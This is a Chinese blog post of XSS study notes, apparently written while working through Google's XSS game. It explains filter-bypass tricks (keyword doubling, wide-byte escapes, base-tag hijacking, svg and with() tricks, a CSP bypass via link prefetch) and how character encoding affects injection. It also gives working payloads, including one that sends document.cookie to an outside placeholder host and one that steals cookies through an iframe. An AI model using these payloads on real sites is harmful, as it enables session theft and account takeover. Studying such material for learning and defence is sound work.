码迷,mamicode.com
首页 > 其他好文 > 详细

XSS学习笔记(1)

时间:2017-10-29 13:49:05      阅读:191      评论:0      收藏:0      [点我收藏+]

标签:==   url   十六进制   名称   脚本   ash   stl   字符   技巧   

  本次笔记实例基于google xss game,一个新手强行瞎jb总结一波

 

  本次笔记主要记录以下三点:1.常见XSS绕过。2.常见XSS利用payload。3.XSS编码问题。

  XSS主要考虑以下几个点:可控的输入参数是什么?输出是什么?到底过滤了什么?可控变量追踪与JS调试

常见XSS绕过:

  关键字绕过  宽字节绕过  编码绕过(第三部分讨论)  其它技巧

  1.关键字绕过(最简单的一种,实战中不存在的)

  比如后端过滤了script,就用<scripscriptt>alert(1);</scripscriptt>

  2.宽字节绕过

  宽字节的问题主要是吃掉一个ascii码,主要是吃掉转义符号‘\‘,GB2312、GBK、GB18030、BIG5、Shift_JIS这些宽字节GBK编码第一字节(高字节)的范围是0x81~0xFE,第二字节(低字节)的范围是0x40~0x7E与0x80~0xFE,这样的十六进制表示。而’\‘符号的十六进制表示为0x5C,因此当需要闭合掉双引号的时候,通过在双引号之前加一个0x81~0xFE之间的字符,即可吃掉转义符号,进而闭合双引号。

  其它技巧(跟着大佬的网络安全课程学习到的,感叹大佬技术之6)

  (1)<base>

  注入base标签会使其后的所有url基于base的标签进行解析,<img><link><a><form><script>等。示例:当注入一个标签<base href="http://IP"></base>,之后只需要在IP的服务器上伪造文件名目录一样的文件,即可使<base>之后的标签解析你的文件。

  (2)使用反引号``代替(),绕()过滤,但是``的内容会全部按照字符串进行解析。

  (3)<svg>

  利用<svg>标签的XML编码特性,script标签会先进行html解码,之后再执行。(编码部分详解)

  (4)with

  可以绕过对象’.‘的过滤。with object指定一个对象,当语句组中对象缺少时可以用来参考。比如location.hash = ‘alert();‘  with(location)with(hash)eval(substring(1));会执行弹窗

  (5)/可作为空格

  <script/onload="alert();"></script>

  (6).通过浏览器禁用前端过滤(未实践)

   禁止掉干扰或防御js,利用chrome过滤器特性,在get参数(反射参数)中添加需要禁止的防御js代码,如:

 

&a=%3Cscript%3Evar%20imageData%20=%20{name:%20%22%22};%3Cscript%3E

  (7).强制重新渲染dom树

  有时我们干掉一些防御代码,或者动态插入了dom树之后,不重新渲染页面dom是无法触发我们的攻击代码的,这时候我们需要一些技巧另其强制重载。
最简单的方法是绕过某个外部js的hook,比如页面引入了一个<script src=‘1.js‘>,这时我们在url的参数前使用/?,比如jjj.php?a=asd 改为 jjj.php/?a=asd 这样传参效果是一样的,但是相对路径会hook不到1.js。从而强制重新渲染。

  如果<script>新增加到dom树,不执行,可以考虑通过事件触发解释器。

  (8).CSP

  csp下获取cookie时两个难点,一是禁用内联脚本执行即注入的<script>不执行。2,无法完成跨域请求,即使得到cookie也无法发出去。第二个问题通过link标签,<link rel="prefetch" href="xxx"/>绕过。第一个问题根据我遇见过的题目来说,一般是在网站的其它地方可以留言,然后注入payload,从其它界面外部调用。

 

  2.常见XSS利用payload。

  在此篇文章仅仅介绍几个简单的payload(根据做过的题的例子)

  (1)首先是最简单的一个cookie获取

    var img=document.createElement(‘img‘);

    img.src=‘http://XXX?cookie=‘+escape(document.cookie);

    document.body.appendChild(img);

   (2) 如果想从本页面窃取同域下其它页面的cookie,使用iframe标签。

    首先是注入一个iframe标签<iframe src="相对/绝对路径“ id="iframe"></iframe>

随后注入<script>,payload如下:

    <script>iframe = document.getElementById(‘iframe‘);

        setTimeout(function(){

          //利用上一个payload,将cookie换成iframe.contentDocument.cookie

        },1000);

    使用setTimeout防止执行script时,iframe还没加载完成。通过contentDocument获得iframe的dom树。

  3.XMLHttpRequest

   通过js发起请求的方法(白帽子讲web安全

  (1)通过dom树或是div.innerHTML属性构造一个form,之后通过form.submit();提交。

     (2)通过AJAX,ajax核心是XMLHttpRequest对象。ie下不支持可以使用ActiveXObject

     var url="XXX"

     var poststr="XXX"

     if(window.XMLHttpRequest)

     {

        var ajax=new XMLHttpRequest();

     }

     else if(window.ActiveXObject)

     {  

        var ajax=new ActiveXObject("Mincrosoft.XMLHTTP");

    }

      else return false;

    ajax.onreadystatechange = function(){

      if(readyState == 4 && ajax.status == 200){

        alert(ajax.responseText);//alert(ajax.responseXML);

      }

    }

    ajax.open("POST",url,true);

    ajax.send(poststr);

 

    ajax.open("POST", url, true);

 

    ajax.send(poststr);

    

 3.XSS编码

 参考博客http://or7.me/2017/09/08/xss_charset/

http://www.freebuf.com/articles/web/43285.html

  编码问题的核心是哪种编码在哪个时刻被哪种规则解析,编码分为三种,url,html,js。具体基础看前两个博客。在这里我想总结以前瞎插的时候遇到的一些问题。

  1.Javascript解析器工作的时候将\u0061\u006c\u0065\u0072\u0074进行js解码后为“alert”,而“alert”是一个有效的标识符名称,它是能被正常解析的。像圆括号、双引号、单引号等等这些控制字符,在进行JavaScript解析的时候仅会被解码为字符串文本或者上面讲的标识符名称,例如:<script>alert(‘YISRC\u0027)</script>对控制字符单引号进行js编码,解析时\u0027被解码成文本单引号,无法闭合因此不能成功执行。JavaScript解析时只有标识符名称不会被当做字符串,控制字符仅会被解析为标示符名称或者字符串,因此‘\u0027‘被解释成单引号文本,\u0028和\u0029被解释成为圆括号文本,不会变为控制字符被解析执行。 因此,在后端进行了html编码+js编码之后,你再怎么瞎鸡巴插也闭合不了引号。

  2.svg与html编码

  html编码是一种约定好的转义,防止<>等干扰页面布局,但是svg标签会先进行xml解析,因此svg里的html实体编码会执行。 

     

举一个防御的例子

比如用户可以控制某一个事件或链接的值,如<a href="XXX" onclick="alert(‘XXX‘)">testlink</a>, alert内容用户可控,防御的话如何进行编码?

此处先进行html解码,后js解码。如果只html编码,那么js解释器执行时,已经是正常字符串,可以闭合掉双引号。但是如果先html编码,后js编码,html解码后,js再次进行解码,特殊字符“仅仅会作为字符串的一部分,因此不会闭合双引号。

  个人观点,想要真正的玩XSS必须精通,js,html,以及浏览器的各种机制。如果只单单学习XSS的话,那么学到的东西都不过是别人发明的,挖过的,玩烂的。想要真正成为黑客,就得自己发明XSS的方法,跟着别人屁股后面,可以成为会挖洞的安全从业者,但绝对不是真正的黑客,绝不是我的初心。

  

XSS学习笔记(1)

标签:==   url   十六进制   名称   脚本   ash   stl   字符   技巧   

原文地址:http://www.cnblogs.com/GHTHYS/p/7748689.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!